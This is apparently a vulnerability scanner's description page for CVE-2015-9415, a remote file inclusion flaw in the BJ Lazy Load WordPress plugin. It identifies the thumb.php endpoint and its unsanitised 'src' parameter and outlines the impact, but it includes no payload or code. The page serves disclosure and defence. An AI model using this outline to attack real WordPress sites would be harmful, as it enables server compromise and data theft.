CVE-2015-9415 Scanner

BJ Lazy Load is a popular plugin for WordPress, a widely used content management system for websites. The plugin is designed to enhance the loading times of websites by lazy loading images and other content, deferring their loading until they enter into the viewport. This makes websites run more efficiently for end-users, especially on mobile devices with slower connections. Website developers and administrators primarily use BJ Lazy Load to optimize site performance. It is frequently updated to align with the latest WordPress versions and web development best practices. BJ Lazy Load aims to improve user experience and SEO rankings by cutting down on loading times.

The vulnerability found in BJ Lazy Load is a Remote File Inclusion (RFI), which is a critical security flaw. An RFI vulnerability allows remote attackers to include files from a different server, which can be executed in the vulnerable server's environment. The flaw found in the version 0.7.5 centers around the plugin's misuse of the TimThumb script, which doesn't fully validate or sanitize inputs. This leads to attackers potentially executing arbitrary code or stealing information. It poses significant security risks to websites relying on BJ Lazy Load if left unpatched.

Technical details about this vulnerability reveal that the vulnerable endpoint is the "thumb.php" script within the BJ Lazy Load plugin. This script improperly handles the "src" parameter, enabling remote file inclusion. Attackers craft a URL that points to a malicious source via this parameter, leading the server to fetch and potentially execute an unauthorized file. The vulnerability is confirmed when the server responds with specific error messages or includes external images. Proper exploitation of the vulnerable parameter can let attackers execute scripts in the WordPress environment remotely.

If exploited, this RFI vulnerability can have severe consequences, ranging from unwanted code executions to full server compromises. Malicious actors could include scripts that steal user data, compromise sensitive information, or even enhance their access privileges. This could degrade the website's performance and reliability, causing further damage to the brand reputation and user trust. Additionally, infected sites may become vectors for further attacks on site visitors. Ensuring timely patch management is critical to minimizing these risks.

REFERENCES

• https://wpscan.com/vulnerability/c15aef94-822d-40eb-80a6-e4a0611cb5c1/
• https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bj-lazy-load/bj-lazy-load-10-remote-file-inclusion-via-timthumb
• https://nvd.nist.gov/vuln/detail/CVE-2015-9415